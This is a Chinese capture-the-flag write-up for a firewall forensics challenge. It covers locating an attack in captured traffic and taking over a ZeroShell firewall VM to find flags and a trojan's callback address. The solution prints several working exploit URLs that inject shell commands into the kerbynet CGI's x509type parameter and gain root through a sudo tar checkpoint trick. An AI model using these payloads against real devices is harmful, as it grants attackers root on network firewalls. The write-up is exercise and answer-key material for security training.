小路是一名实习生，接替公司前任网管的工作，一天发现公司网络出口出现了异常的通信，现需要通过回溯出口流量对异常点位(防火墙)进行定位，并确定异常的设备。然后进行深度取证检查（需要获取root权限）。现在需要你从网络攻击数据包中找出漏洞攻击的会话，分析会话编写exp或数据包重放获取防火墙设备管理员权限，查找防火墙设备上安装的木马，然后分析木马外联地址和通信密钥以及木马启动项位置。

文件名：2e9c01da1d333cb8840968689ed3bc57.7z
文件大小：270.1m
下载链接1：https://pan.baidu.com/s/1N58ui-5Ll4Zk7Ys4SUGFvw 提取码：GAME
下载链接2：https://drive.google.com/file/d/19VKjCBaF_X2VvexHGwS__TRhnS39njVT/view
解压密码：11b0526b-9cfb-4ac4-8a75-10ad9097b7ce
来源：长城杯&CISCN官网

部署文档

1、环境安装

解压环境zeroshell.7z，使用vmware17或以上版本加载zeroshell虚拟机

2、配置网络

1，打开虚拟网络编辑器

2、选择VMnet8 Net模式网卡，选择更改配置

3、选择VMnet8 网络，修改子网IP为61.139.2.0，再点击应用和确定

4、启动虚拟机，等虚拟机启动完成后，浏览器打开http://61.139.2.100 即可访问zeroshell防火墙环境

题目

从数据包中找出攻击者利用漏洞开展攻击的会话(攻击者执行了一条命令)，写出该会话中设置的flag,结果提交形式:flag{x}

筛选http流有一条长长的追踪一下看一下

看到referer头

解密一下

通过漏洞利用获取设备控制权限，然后査找设备上的flag文件，提取flag文件内容，结果提交形式:flag{xxxxxxxxxx}

利用找到的payload

http://61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%27find / -name flag*%27%0A%27

http://61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%27cat /Database/flag%27%0A%27

找出受控机防火墙设备中驻留木马的外联域名或IP地址，结果提交形式:flag{xxx}，如flag{www.abc.com} 或 flag(16.122.33.44)

http://61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%27netstat -antp%27%0A%27

请写出木马进程执行的本体文件的名称，结果提交形式:flag{xxxxx}，仅写文件名不加路径

直接查看对应/proc/进程号的内容

http://61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%27 ls -al /proc/10648%27%0A%27